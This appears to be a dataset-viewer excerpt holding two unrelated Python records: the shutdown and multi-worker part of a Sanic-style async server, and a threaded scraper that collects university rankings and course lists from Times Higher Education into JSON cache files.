    :param loop: asyncio compatible event loop
    :param run_async: bool: Do not create a new event loop for the server,
                      and return an AsyncServer object rather than running it
    :param signal: shared Signal instance; a fresh one is created when omitted
    :param asyncio_server_kwargs: key-value args for asyncio/uvloop
                                  create_server method
    :return: Nothing
    """
    # Fixed: the original signature used the mutable default
    # ``signal=Signal()``; after one shutdown set ``stopped = True`` on it,
    # every subsequent ``serve()`` call in the process saw a stopped signal
    # and refused keep-alive connections.
    if signal is None:
        signal = Signal()

    if not run_async:
        # create new event_loop after fork
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)

    if app.debug:
        loop.set_debug(app.debug)

    app.asgi = False

    connections = connections if connections is not None else set()
    server = partial(
        protocol,
        loop=loop,
        connections=connections,
        signal=signal,
        app=app,
        state=state,
    )
    asyncio_server_kwargs = (
        asyncio_server_kwargs if asyncio_server_kwargs else {}
    )
    server_coroutine = loop.create_server(
        server,
        host,
        port,
        ssl=ssl,
        reuse_port=reuse_port,
        sock=sock,
        backlog=backlog,
        **asyncio_server_kwargs,
    )

    if run_async:
        return AsyncioServer(
            loop=loop,
            serve_coro=server_coroutine,
            connections=connections,
            after_start=after_start,
            before_stop=before_stop,
            after_stop=after_stop,
        )

    trigger_events(before_start, loop)

    try:
        http_server = loop.run_until_complete(server_coroutine)
    except BaseException:
        logger.exception("Unable to start server")
        return

    trigger_events(after_start, loop)

    # Ignore SIGINT when run_multiple
    if run_multiple:
        signal_func(SIGINT, SIG_IGN)

    # Register signals for graceful termination
    if register_sys_signals:
        if OS_IS_WINDOWS:
            ctrlc_workaround_for_windows(app)
        else:
            for _signal in [SIGTERM] if run_multiple else [SIGINT, SIGTERM]:
                loop.add_signal_handler(_signal, app.stop)

    pid = os.getpid()
    try:
        logger.info("Starting worker [%s]", pid)
        loop.run_forever()
    finally:
        logger.info("Stopping worker [%s]", pid)

        # Run the on_stop function if provided
        trigger_events(before_stop, loop)

        # Wait for event loop to finish and all connections to drain
        http_server.close()
        loop.run_until_complete(http_server.wait_closed())

        # Complete all tasks on the loop
        signal.stopped = True
        for connection in connections:
            connection.close_if_idle()

        # Gracefully shutdown timeout.
        # We should provide graceful_shutdown_timeout,
        # instead of letting connection hangs forever.
        # Let's roughly calcucate time.
        graceful = app.config.GRACEFUL_SHUTDOWN_TIMEOUT
        start_shutdown = 0
        while connections and (start_shutdown < graceful):
            loop.run_until_complete(asyncio.sleep(0.1))
            start_shutdown = start_shutdown + 0.1

        # Force close non-idle connection after waiting for
        # graceful_shutdown_timeout
        coros = []
        for conn in connections:
            if hasattr(conn, "websocket") and conn.websocket:
                coros.append(conn.websocket.close_connection())
            else:
                conn.close()

        _shutdown = asyncio.gather(*coros)
        loop.run_until_complete(_shutdown)

        trigger_events(after_stop, loop)

        loop.close()
def serve_multiple(server_settings, workers):
    """Start multiple server processes simultaneously. Stop on interrupt
    and terminate signals, and drain connections when complete.

    :param server_settings: kw arguments to be passed to the serve function
    :param workers: number of workers to launch
    :param stop_event: if provided, is used as a stop signal
    :return:
    """
    server_settings["reuse_port"] = True
    server_settings["run_multiple"] = True

    # When the caller did not hand us a socket, bind a shared, inheritable
    # one ourselves so every forked worker can accept on the same port.
    if server_settings.get("sock") is None:
        shared_sock = socket()
        shared_sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        shared_sock.bind((server_settings["host"], server_settings["port"]))
        shared_sock.set_inheritable(True)
        server_settings["sock"] = shared_sock
        server_settings["host"] = None
        server_settings["port"] = None

    worker_processes = []

    def sig_handler(signal, frame):
        logger.info("Received signal %s. Shutting down.", Signals(signal).name)
        for proc in worker_processes:
            os.kill(proc.pid, SIGTERM)

    signal_func(SIGINT, lambda s, f: sig_handler(s, f))
    signal_func(SIGTERM, lambda s, f: sig_handler(s, f))

    mp = multiprocessing.get_context("fork")
    for _ in range(workers):
        proc = mp.Process(target=serve, kwargs=server_settings)
        proc.daemon = True
        proc.start()
        worker_processes.append(proc)

    for proc in worker_processes:
        proc.join()

    # the above processes will block this until they're stopped
    for proc in worker_processes:
        proc.terminate()

    server_settings.get("sock").close()
|
from requests import get
from bs4 import BeautifulSoup as BS
import tabulate
from pprint import pprint
import os
import json
from threading import Thread

# Scrape the THE "top 50 universities by reputation 2018" table into
# `universities` (the visible row text, including the header row) and
# `urls` (per-university detail-page links, header row excluded).
url = 'https://www.timeshighereducation.com/student/best-universities/top-50-universities-reputation-2018#survey-answer'
raw = get(url)
soup = BS(raw.text, 'html.parser')

table = soup.find('table')
trs = table.findAll('tr')

universities = []
urls = []

# enumerate() replaces the original trs.index(tr) lookup, which was O(n)
# per row (O(n^2) overall) and would misfire if two rows compared equal.
for row_num, tr in enumerate(trs):
    if row_num != 0:  # row 0 is the table header and has no link
        urls.append(tr.find('a').get('href'))
    temp = tr.getText().split('\n')
    temp.pop()  # drop the empty trailing field left by the final newline
    universities.append(temp[:])

# print(tabulate.tabulate(universities[1:],headers = universities[0]))
def getCourses(url, num):
    """Fetch (or load from a local JSON cache) the course list for one
    university detail page.

    :param url: university detail-page URL; its path tail (``url[63:]``,
        assumed to be the university slug — TODO confirm against caller)
        doubles as the cache file name
    :param num: thread number, used only for progress logging
    :return: dict mapping the slug to a list of course dicts
        (``{'courseName': ..., 'subjects': [...]}``); returns ``None`` when
        the page has no course list
    """
    print('Thread', num, 'Started')
    fileName = url[63:] + '.json'
    if os.path.exists(fileName):
        # Cache hit: reuse previously scraped data. `with` guarantees the
        # handle is closed (the original `open(...).read()` leaked it).
        with open(fileName) as cache_file:
            data = json.load(cache_file)
        print('Thread', num, 'Ended')
        return data
    else:
        raw = get(url)
        soup = BS(raw.text, 'html.parser')
        ul = soup.find('ul', class_='courses-list-group list-group')
        if ul is not None:  # some pages have no course list at all
            lis = ul.findAll('li')
            dic = {}
            courseList = []
            main_dic = {}
            for li in lis:
                if li.find('h3') is not None:
                    dic['courseName'] = li.find('h3').getText().strip()
                # Hoisted: the original built this list twice per <li>.
                subjects = [x.getText().strip() for x in li.findAll('li')]
                if subjects != []:
                    dic['subjects'] = subjects
                if dic.copy() not in courseList:
                    courseList.append(dic.copy())
            main_dic[url[63:]] = courseList
            with open(fileName, 'w+') as file:
                json.dump(main_dic, file)
            print('Thread', num, 'Ended')
            return main_dic
def allCourses(url_list):
    """Scrape every university page concurrently, one thread per URL."""
    for thread_num, page_url in enumerate(url_list):
        worker = Thread(target=getCourses, args=(page_url, thread_num))
        worker.start()


allCourses(urls)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.